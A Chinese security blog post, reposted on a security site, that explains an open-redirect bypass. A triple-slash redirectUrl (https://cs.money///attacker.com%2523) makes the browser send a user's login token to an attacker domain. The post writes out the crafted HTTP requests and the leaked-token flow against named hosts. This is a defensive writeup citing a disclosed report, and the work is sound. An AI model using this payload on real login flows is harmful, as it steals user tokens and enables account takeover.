重定向绕过另类思路

admin
admin
admin
0
文章
0
评论
2026-05-06 05:18:56 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档分析登录流程中的重定向绕过漏洞,攻击者通过构造含三个斜杠(///)的redirectUrl参数,使浏览器将https://cs.money///attacker.com解析为攻击者域名,导致用户token泄露。关键发现是浏览器对特定URL格式的异常解析机制,建议开发者严格校验重定向地址合法性。 综合评分: 76 文章分类: WEB安全,漏洞分析,实战经验,红队,渗透测试

cover_image

重定向绕过另类思路

原创

h1 h1

迪哥讲事

2026年5月5日 10:00 四川

在小说阅读器读本章

去阅读

正文

正常情况下的请求流程

  1. 用户点击登录
GET /login?redirectUrl=https://cs.money/dashboard&callbackUrl=https://cs.money/dashboard HTTP/1.1
Host: auth.dota.trade
  1. 登录成功后的重定向(服务端返回)
HTTP/1.1 302 Found
Location: https://cs.money/dashboard?token=USER_TOKEN
  1. 浏览器跳转
GET /dashboard?token=USER_TOKEN HTTP/1.1
Host: cs.money

存在漏洞时的请求流程(Open Redirect)

  1. 构造恶意登录 URL
GET /login?redirectUrl=https://cs.money///attacker.com%2523&callbackUrl=https://cs.money///attacker.com%2523 HTTP/1.1
Host: auth.dota.trade
  1. 登录成功后的响应
HTTP/1.1 302 Found
Location: https://cs.money///attacker.com#?token=USER_TOKEN
  1. 浏览器解析(关键点) 浏览器会把:
https://cs.money///attacker.com

解析为:

https://attacker.com
  1. 实际跳转请求
GET /#?token=USER_TOKEN HTTP/1.1
Host: attacker.com

这里重定向的思路就是添加三个斜杠—>///

主要做一个记录

假期最后一天,优惠还有

参考

https://hackerone.com/reports/905607

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:迪哥讲事 h1 h1《重定向绕过另类思路》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0